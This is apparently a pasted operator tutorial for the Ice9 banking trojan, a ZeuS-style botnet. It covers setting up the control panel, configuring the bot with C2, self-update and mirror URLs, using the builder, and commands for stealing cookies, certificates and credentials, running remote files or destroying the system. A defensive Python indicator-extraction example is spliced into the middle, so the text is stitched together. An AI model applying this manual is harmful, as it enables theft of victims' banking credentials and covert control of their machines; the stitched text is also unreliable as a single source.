ICE9 TUTORIAL


SUBMITTED BY: Guest

DATE: Oct. 29, 2013, 4:23 p.m.

FORMAT: Text only

SIZE: 6.7 kB

HITS: 1033

======================================================================
BRIEF DESCRIPTION
======================================================================
Ice9 is a new formgrabber bot in the style of ZeuS.
It was based on the second-line version of ZeuS and was redesigned and improved in quality.
The main task was to increase the check-in rate (otstuk) relative to its progenitor, and that task was successfully accomplished.
Evasion of proactive protection and firewalls was improved.
The injection technology was reworked in the same way, which lets injects work much more stably.
The bot is constantly evolving and being updated.
======================================================================
FUNCTIONAL
======================================================================
- Keylogging
- Grabbing HTTP and HTTPS form data and injecting its code into Internet Explorer and browsers based on its engine (AOL, Maxthon, etc.), and Mozilla Firefox
- Grabbing cookies, .sol files and saved form data
- Grabbing FTP clients: FlashFXP, Total Commander, WsFTP 12, FileZilla 3, FAR Manager 1,2, WinSCP 4.2, FTP Commander, CoreFTP, SmartFTP
- Grabbing Windows Mail, Live Mail, Outlook
- Socks with the possibility of backconnect
- Screenshots in real time, as well as the ability to set a trigger when a particular URL is viewed
- Obtaining certificates from the "MY" store (certificates marked "not exportable" are not exported correctly) and handling them. After that, any imported certificate will be stored on the server.
- Sniffer for TCP traffic
- Wide range of commands to control the infected PCs
- VNC module
======================================================================
PROCEDURE
======================================================================
The installation procedure consists of 2 parts:
a) installing the server part (control panel, bot)
b) configuring the bot
- Installing the server side:
Upload the folder with the server part to the server and set the system directory to CHMOD 777
Create a MySQL database
Run the script install/index.php in the server folder you uploaded and follow the online instructions
Note: the php module mb_strings is required
- Bot configuration procedure:
The bot has a configuration file, settings.txt, containing all the settings it needs in order to work.
The settings file is divided into several sections: Settings (basic settings)
{"Settings"
; Path to the bot itself (the bot downloads this EXE if a newer config version was created and tries to self-update)
autoupdate_path "http://localhost/bot.exe"
; Gateway to the admin panel (the path through which the bot passes information to the control panel)
receiving_script_path "http://localhost/script.php"
; File name with injects
injects_file "injects.txt"
; Data grabbing filters (the format is fully compatible with the ZeuS format)
{"DataGrabFilters"
; "http://mail.rambler.ru/*" "passw;login"
}
; Fake hidden URI redirect (the format is fully compatible with the ZeuS format)
{"URLRedirects"
; "http://www.rambler.ru" "http://www.yandex.ru" "GP" "" ""
}
; Paths to backup config files (if the main config is unavailable, the bot will attempt to download and use the backup configuration file)
{"MirrorServers"
"http://advdomain/cfg1.bin"
}
; URI masks
{"URLMasks"
"Nhttp://*odnoklassniki.ru/*"
"Nhttp://vkontakte.ru/*"
"S*/login.osmp.ru/*"
"S*/atl.osmp.ru/*"
}
}
The list of available URI masks:
N - do not write data into reports
S - take a screenshot on mouse clicks in the page area matching the URI mask
C - save all cookies associated with that URI and block access to it
B - block access to the URI
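Recovering this settings.txt layout from a sample is a routine analyst task, since the C2, update and mirror URLs and the flagged URL masks are exactly what a responder blocks and alerts on. The following is an added example, not part of the original tutorial: a small parser for the section/key/value format shown above plus an indicator extractor. The SAMPLE config and its .invalid domains are constructed, the MASK_FLAGS labels are mine, and hoisting nested sections to the top level by name is a simplification of this example.

```python
import re

# Constructed sample in the settings.txt layout shown above; domains are placeholders.
SAMPLE = '''{"Settings"
autoupdate_path "http://c2.example.invalid/bot.exe"
receiving_script_path "http://c2.example.invalid/script.php"
{"DataGrabFilters"
; "http://mail.example.invalid/*" "passw;login"
}
{"MirrorServers"
"http://mirror.example.invalid/cfg1.bin"
}
{"URLMasks"
"Nhttp://*social.example.invalid/*"
"S*/login.bank.example.invalid/*"
"B*/security.example.invalid/*"
}
}'''

# Flag letters as described under "The list of available URI masks" (labels are mine)
MASK_FLAGS = {"N": "no-report", "S": "screenshot", "C": "cookies+block", "B": "block"}
TOKEN = re.compile(r'"([^"]*)"|(\S+)')  # a quoted string or a bare word

def parse_config(text):
    """Return {section: [(key, [values])]}. Nested sections are hoisted to the top
    level by name; list-style entries (a lone quoted string) get key ''."""
    sections, stack = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):   # blank line or ';' comment
            continue
        if line.startswith("{"):               # {"Name" opens a section
            stack.append(line[1:].strip().strip('"'))
            sections.setdefault(stack[-1], [])
        elif line == "}":                      # closes the innermost section
            stack.pop()
        elif stack:                            # key/value pair or list entry
            toks = [q if b == "" else b for q, b in TOKEN.findall(line)]
            key, vals = ("", toks) if line.startswith('"') else (toks[0], toks[1:])
            sections[stack[-1]].append((key, vals))
    return sections

def extract_indicators(cfg):
    """What a responder blocks or alerts on: C2/update/mirror URLs and URL masks."""
    c2 = [v[0] for k, v in cfg.get("Settings", [])
          if k in ("autoupdate_path", "receiving_script_path") and v]
    c2 += [v[0] for _, v in cfg.get("MirrorServers", []) if v]
    masks = [(MASK_FLAGS.get(v[0][:1], "?"), v[0][1:]) for _, v in cfg.get("URLMasks", []) if v]
    return {"c2_urls": c2, "url_masks": masks}
```

Calling extract_indicators(parse_config(SAMPLE)) yields the three URLs for a blocklist and each mask with its flag meaning; the commented-out DataGrabFilters entry is correctly ignored.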
======================================================================
DESCRIPTION OF THE BUILDER
======================================================================
- Creating a bot: (not available in the version bound to the host)
Settings path - the path to the configuration file
Botnet's name - the name of the botnet
Settings retrieve timeout - interval between the bot's downloads of settings from the server
Statistics retrieve timeout - interval between sending reports to the server
RC4 encryption key - the encryption key (must match the key in the admin panel)
Remove certificate - remove certificates when installing the bot
Disable TCP - disable the TCP server (socks server, real-time screenshots); increases stealth
- Creating a configuration file:
RC4 encryption key - the encryption key (must match the key in the admin panel)
Settings file - the path to the configuration file
- Finding and removing the bot from the system:
Enter the RC4 encryption key at the bottom of the window.
If a bot with the same key is present on your system, the delete button will become available.
======================================================================
LIST OF BOT COMMANDS (commands are entered in the Scripts section of the admin panel)
======================================================================
Working with the OS.
os_shutdown - Shut down the computer
os_reboot - Reboot the computer
Working with the bot.
bot_uninstall - Remove the bot from the computer
bot_update [url] - Update the bot's configuration
bot_update_exe [url] - Update the bot executable
bot_bc_add [service] [ip] [port] - Create a backconnect connection with the bot
bot_bc_remove [service] [ip] [port] - Remove a backconnect connection with the bot
bot_httpinject_disable [url_mask] - Disable injects on the bot
bot_httpinject_enable [url_mask] - Enable injects on the bot
Working with the user.
user_destroy - Destroy the operating system of the bot
user_logoff - Terminate the user session on the bot
user_execute [url] - Run the executable file on the bot's computer; this command also updates the bot exe
user_cookies_get - Get cookies from the bot's computer
user_cookies_remove - Remove cookies from the bot's computer
user_certs_get - Get certificates from the bot's computer
user_certs_remove - Delete certificates from the bot's computer
user_url_block [url_mask] - Block URL
user_url_unblock [url_mask] - Unblock URL
user_homepage_set [url] - Set the URL as the bot's homepage
user_flashplayer_get - Get SOL files from the bot's computer
user_flashplayer_remove - Delete SOL files from the bot's computer
